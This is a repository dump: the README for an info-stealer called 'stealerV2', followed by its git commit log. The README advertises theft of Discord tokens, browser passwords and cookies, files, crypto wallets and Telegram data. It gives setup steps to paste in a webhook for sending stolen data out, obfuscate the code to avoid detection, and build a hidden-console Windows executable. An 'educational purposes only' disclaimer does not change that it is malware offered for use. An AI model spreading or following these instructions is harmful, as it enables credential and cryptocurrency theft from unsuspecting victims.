======================: FILES :======================
======================: README CONTENT :======================
# stealerV2
<h1 align="center">  Stealer Cookie and MORE </h1> 
<p align= "center"> <kbd> New stealer 
undetectable </kbd><br><br>

<p></p>



## Features:
» Grab Discord Information and HQ Friends.

» Grab Password & cookies.

» Grab Files.

» Shows Crypto Wallets

» Grab metamask/exodus

» Grab Telegram

» Grab chromium based Passwords


## Setup:
 
First paste and save your webhook address instead of `"WEBHOOK HERE"` in main.py

If you use obfuscator it will be undetectable.

if you have an error while installing try `pip install -r requirements.txt`

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type `pip install auto_py_to_exe`

And after installed `python -m auto_py_to_exe`

Browse file Select `One file and Windows Based (hide the console)`

<img style="border-radius: 15px; display: block; margin-left: auto; margin-right: auto; margin-bottom:20px;" width="70%" src="https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/pyy.png"></img>

And press convert .py .exe

 <hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">

## Pictures:
 

 
## Disclaimer:

This tool is for educational purposes only. It is coded for you to see how your files are simply stolen and how to take action. Do not use for illegal purposes. We are never responsible for illegal use. <bold>Educational purpose only!</bold>


====================== GIT HISTORY: ======================
8618056 HEAD@{0}: clone: from https://github.com/HatGirl-zz/steal-cook
commit 861805684036e483db5a99a4fc7a71db219bb81e
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 17:00:41 2022 +0100

    Update main.py

commit 1974aadee6f07f5f39f131206d9d75678fdb4d05
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 16:59:59 2022 +0100

    Update README.md

commit b267e7ce4c287f60e71aa478db58bbbe4e349be5
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 16:59:11 2022 +0100

    Update README.md

commit f76c4a14eaa629b849ae0365aca88b849e959ded
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 16:58:14 2022 +0100

    Update README.md

commit 160c99e2cd7d8075edb4dbd35d78dc462205e20a
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 16:56:50 2022 +0100

    Add files via upload

commit 94dcd873c2b67e5175c2045eb46c9b0ffb8386a3
Author: HatGirl-zz <120135553+HatGirl-zz@users.noreply.github.com>
Date:   Sun Dec 11 16:56:14 2022 +0100

    Initial commit
